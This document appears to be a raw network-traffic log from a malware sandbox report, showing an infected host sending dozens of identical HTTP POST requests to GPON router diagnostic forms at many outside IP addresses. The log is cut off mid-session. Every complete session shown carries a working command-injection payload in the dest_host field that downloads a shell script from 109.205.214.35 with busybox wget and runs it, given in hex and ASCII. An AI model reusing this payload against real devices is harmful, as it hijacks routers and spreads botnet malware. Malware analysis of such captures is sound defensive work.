                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        137192.168.2.13582605.108.84.137443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.435012102 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        138192.168.2.1341636212.7.12.66443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.435046911 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        139192.168.2.1336916109.249.67.48443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.435075998 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        140192.168.2.1346652118.41.219.32443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.435143948 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        141192.168.2.13427345.178.196.217443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.435158014 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        142192.168.2.1338378118.235.91.81443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.435184002 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        143192.168.2.13594165.39.237.226443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.435204983 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        144192.168.2.135628842.250.18.83443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.435237885 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        145192.168.2.13332445.208.228.72443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.435266972 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        146192.168.2.135017642.240.155.77443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.435286045 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        147192.168.2.135367442.184.163.183443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.435323954 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        148192.168.2.1342458118.1.148.28443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.435353994 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        149192.168.2.1355336212.60.96.32443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.435364962 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        150192.168.2.13572525.231.230.227443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.435378075 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        151192.168.2.13575905.3.31.52443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.435440063 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        152192.168.2.133331842.208.240.155443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.435470104 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        153192.168.2.1350792212.118.73.190443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.435519934 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        154192.168.2.1343816212.10.198.46443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.435539961 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        155192.168.2.135502042.249.99.229443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.435565948 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        156192.168.2.1360322212.44.139.155443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.435578108 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        157192.168.2.1351006118.175.161.131443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.435609102 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        158192.168.2.1351934212.245.214.201443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.435638905 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        159192.168.2.13357885.168.229.98443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.435678959 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
